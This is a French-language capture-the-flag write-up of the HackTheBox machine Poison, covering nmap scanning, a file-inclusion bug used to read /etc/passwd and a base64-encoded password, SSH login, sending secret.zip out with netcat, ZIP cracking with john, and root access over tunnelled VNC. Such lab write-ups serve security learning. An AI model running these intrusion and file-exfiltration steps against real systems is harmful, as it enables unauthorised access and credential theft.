Poison HackTheBox (Writeup)

Skills:

Local File Inclusion (LFI)
Cracking ZIP file
Abusing VNC - vncviewer [Privilege Escalation]

Reconaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.84 -oG allPorts

Scan de la version des ports avec Nmap 22, 80:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.10.84 -oN targeted

Port 80 - FreeBSD

FreeBSD est un système d'exploitation gratuit et open source populaire qui repose sur la version BSD du système d'exploitation Unix. FreeBSD a la réputation d'être rapide, stable et particulièrement adapté à un fonctionnement en tant que serveur Internet ou serveur de fichiers.

Exploitation du LFI

Nous identifions un paramètre vulnérable :

?file=FICHIER

Ce qui nous permet de lire n'importe quel fichier accessible sur le système.

En listant pwnbackup.txt, nous trouvons une chaîne indiquant un mot de passe chiffré 13 fois en base64 :

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo

Décryptage avec une boucle echo :

echo "Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=" | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d; echo

Le mot de passe révélé est :

Charix!2#4%6&8(0

Recherche des utilisateurs sur le système

Nous listons /etc/passwd via le LFI et trouvons l'utilisateur charix.

Connexion SSH avec les identifiants trouvés :

ssh [email protected]

Flag user.txt :)

Flag user.txt récupéré

Escalade de privilèges

Nous trouvons un fichier secret.zip.

Transfert du fichier avec Netcat

Sur notre machine :

nc -nvlp 443 > secret.zip
cat secret.zip  | nc 10.10.14.50 443

Le fichier est protégé par un mot de passe.

Crack du mot de passe ZIP

Extraction du hash avec zip2john :

Nous allons donc utiliser zip2john pour extraire le hash

zip2john secret.zip > hash

Cracking du mot de passe avec john :

john -w:/usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt hash

Résultat : Pas trouvé

Nous testons la réutilisation du mot de passe découvert précédemment :

Succès !

Le fichier secret contient des caractères bizarres, suggérant une clé d'accès

Explotation 5800,5801,5900,5901 - VNC

Nous identifions des ports en écoute :

netstat -an | grep LISTEN

Tunnel SSH pour rediriger les ports VNC

ssh -L 5801:127.0.0.1:5801 -L 5901:127.0.0.1:5901 [email protected]

Scan des services VNC :

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5801 127.0.0.1
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5901 127.0.0.1

Connexion via vncviewer

Nous utilisons le mot de passe trouvé dans secret.zip :

vncviewer -passwd secret 127.0.0.1:5901

Nous obtenons un accès root sur la machine !

Flag root.txt

Mis à jour il y a 1 an

hashtagReconaissance

hashtagPort 80 - FreeBSD

hashtagExploitation du LFI

hashtagRecherche des utilisateurs sur le système

hashtagFlag user.txt :)

hashtagEscalade de privilèges

hashtagTransfert du fichier avec Netcat

hashtagCrack du mot de passe ZIP

hashtagExplotation 5800,5801,5900,5901 - VNC

hashtagTunnel SSH pour rediriger les ports VNC

hashtagConnexion via vncviewer

hashtagFlag root.txt